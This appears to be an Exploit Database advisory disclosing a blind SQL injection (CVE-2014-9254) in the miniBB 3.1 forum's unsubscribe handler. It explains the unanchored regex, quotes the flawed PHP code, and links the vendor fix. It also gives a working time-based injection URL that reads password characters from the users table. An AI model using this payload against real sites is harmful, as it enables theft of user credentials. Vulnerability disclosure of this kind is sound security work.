MiniBB 3.1 – Blind SQL Injection

• Exploit Database
• 16 阅读

• 作者： Kacper Szurek
  日期： 2014-12-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/35579/

• # Exploit Title: miniBB 3.1 Blind SQL Injection
  # Date: 23-11-2014
  # Software Link: http://www.minibb.com/
  # Exploit Author: Kacper Szurek
  # Contact: http://twitter.com/KacperSzurek
  # Website: http://security.szurek.pl/
  # CVE: CVE-2014-9254
  # Category: webapps
  
  1. Description
  
  preg_match() only check if $_GET['code'] contains at least one letter or digit (missing ^ and $ inside regexp).
  
  File: bb_func_unsub.php
  $usrid=(isset($_GET['usrid'])?$_GET['usrid']+0:0);
  
  $allowUnsub=FALSE;
  $chkCode=FALSE;
  
  if(isset($_GET['code']) and preg_match("#[a-zA-Z0-9]+#", $_GET['code'])){
  	//trying to unsubscribe directly from email
  	$chkField='email_code';
  	$chkVal=$_GET['code'];
  	$userCondition=TRUE;
  	$chkCode=TRUE;
  }
  else{
  	//manual unsubsribe
  	$chkField='user_id';
  	$chkVal=$user_id;
  	$userCondition=($usrid==$user_id);
  }
  
  if ($topic!=0 and $usrid>0 and $userCondition and $ids=db_simpleSelect(0, $Ts, 'id, user_id', 'topic_id', '=', $topic, '', '', $chkField, '=', $chkVal))
  
  http://security.szurek.pl/minibb-31-blind-sql-injection.html
  
  2. Proof of Concept
  
  http://minibb-url/index.php?action=unsubscribe&usrid=1&topic=1&code=test' UNION SELECT 1, IF(substr(user_password,1,1) = CHAR(99), SLEEP(5), 0) FROM minibbtable_users WHERE user_id = 1 AND username != '
  
  This SQL will check if first password character user ID=1 is “c”.
  
  If yes, it will sleep 5 seconds.
  
  3. Solution:
  
  http://www.minibb.com/forums/news-9/blind-sql-injection-fix-6430.html